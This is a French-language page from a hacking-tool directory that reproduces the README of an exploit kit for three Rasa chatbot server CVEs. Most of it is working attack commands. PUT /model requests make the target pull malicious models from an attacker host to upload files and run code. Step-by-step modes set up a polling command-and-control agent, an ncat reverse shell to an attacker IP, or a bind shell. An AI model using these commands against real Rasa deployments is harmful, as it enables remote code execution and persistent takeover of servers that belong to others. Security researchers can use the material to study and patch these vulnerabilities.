Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Rasa-cve-exp — CVE-2024-49375、CVE-2021-42556、CVE-2021-41127 | Kitploit
Outils/GitHubGitHub/lierbushiwo/rasa-cve-exp
Analyse des VulnérabilitésExploitationExploitation d'Applications WebPost-ExploitationTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHublierbushiwo/rasa-cve-exp

Rasa-cve-exp

CVE-2024-49375、CVE-2021-42556、CVE-2021-41127

il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

Rasa-cve-exp

CVE-2021-42556

  • server-1.py

Exécution directe

root@kitploit:~
python server-1.py

image-20260604134536291

Téléchargement arbitraire de fichier

root@kitploit:~
PUT /model
{"model_server":{"url":"http://192.168.244.128:5000/stage1","wait_time_between_pulls":0}}

image-20260604135046296

Résultat :

image-20260604135232815

CVE-2021-41127

  • server-1.py

Nom de modèle par défaut : evil_import_model.tar.gz

Démo de modèle malveillant

root@kitploit:~
version: "3.1"
intents:
- greet
responses:
  utter_greet:
  - text: "PWNED_BY_CTF"
nlu:
- intent: greet
  examples: |
    - hello
    - hi
rules:
- rule: greet rule
  steps:
  - intent: greet
  - action: utter_greet

Définition d'une règle de dialogue malveillante

Saisir greet renvoie PWNED_BY_CTF

root@kitploit:~
PUT /model
{"model_server":{"url":"http://192.168.244.128:5000/stage2-probe-model","wait_time_between_pulls":0}

image-20260604134831347

Résultat :

image-20260604140230431

CVE-2024-49375

  • model.py
  • reverse_server.py

model.py modifie les données spécifiées dans l'archive compressée.

Exécution directe : lit par défaut le modèle dans le répertoire /model, le modifie et le sauvegarde dans le dossier courant sous le nom evil_import_model.tar.gz

image-20260604143558105

Spécifier l'IP de reverse shell

Nom de modèle par défaut : evil_import_model.tar.gz

root@kitploit:~
python reverse_server.py --reverse-host 192.168.244.128

image-20260604140728541

Envoyer les données une par une.

Autres méthodes d'exploitation (exp)

Dans un scénario réel, les choses peuvent différer.

  • server-2.py

Trois modes


Mode C2 (interrogation HTTP, recommandé)

root@kitploit:~
Machine attaquante                    Conteneur Rasa (cible)
  │                                        │
  ├─ Lancer server-2.py ──────────────────┤
  ├─ PUT /model ──→ Télécharge pwnmod.py dans /app/
  ├─ PUT /model ──→ Télécharge modèle malveillant → import pwnmod → agent démarre
  │                                        │
  │  ← GET /poll?agent=xxx ───────────────┤  Interrogation toutes les 3s
  ├─ /enqueue?cmd=id ─────────────────────┤
  │  ← GET /poll ─────────────────────────┤  Récupère la commande
  │  ← POST /result ──────────────────────┤  Renvoie le résultat
  ├─ /last?agent=xxx ──→ Lit le résultat
root@kitploit:~
# Lancer sur la machine attaquante
python server-2.py --mode c2 --c2-base-url http://<IP_attaquante>:8000 --port 8000

# Déclencher l'exploit (deux étapes)
curl -X PUT http://<adresse_rasa>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<IP_attaquante>:8000/write-module"}}'

curl -X PUT http://<adresse_rasa>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<IP_attaquante>:8000/model"}}'

# Envoyer une commande
curl "http://<IP_attaquante>:8000/enqueue?cmd=id"

# Attendre 8 secondes puis lire le résultat (agent interroge toutes les 3s + temps d'exécution)
curl "http://<IP_attaquante>:8000/last?agent=<hostname>"

# Si on ne spécifie pas l'agent (joker)
curl "http://<IP_attaquante>:8000/enqueue?cmd=whoami"
curl "http://<IP_attaquante>:8000/last"

Mode Reverse (reverse shell)

root@kitploit:~
# 1) Écouter sur la machine attaquante
ncat -lvnp 4444

# 2) Lancer server-2.py sur la machine attaquante
python server-2.py --mode reverse --reverse-host <IP_attaquante> --reverse-port 4444 --port 8000

# 3) Déclencher l'exploit
curl -X PUT http://<adresse_rasa>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<IP_attaquante>:8000/write-module"}}'

curl -X PUT http://<adresse_rasa>:5005/model \
  -H "Content-Type: application/json" \
  -d '{"model_server": {"url": "http://<IP_attaquante>:8000/model"}}'

# 4) nc reçoit l'invite $, interaction directe

Mode Bind (shell direct, peu utilisé)

root@kitploit:~
python server-2.py --mode bind --bind-port 4444 --port 8000
# L'agent écoute sur 0.0.0.0:4444 dans le conteneur cible
# ncat <IP_cible> 4444 pour se connecter

Explication des ports/adresses

Paramètre
Télécharger l’outil
Signification
--port 8000Port d'écoute de server-2.py lui-même
--c2-base-urlURL de base complète pour l'interrogation de l'agent en mode C2 (doit être une adresse accessible par le conteneur)
--reverse-hostIP cible pour le reverse shell
--reverse-portPort cible pour le reverse shell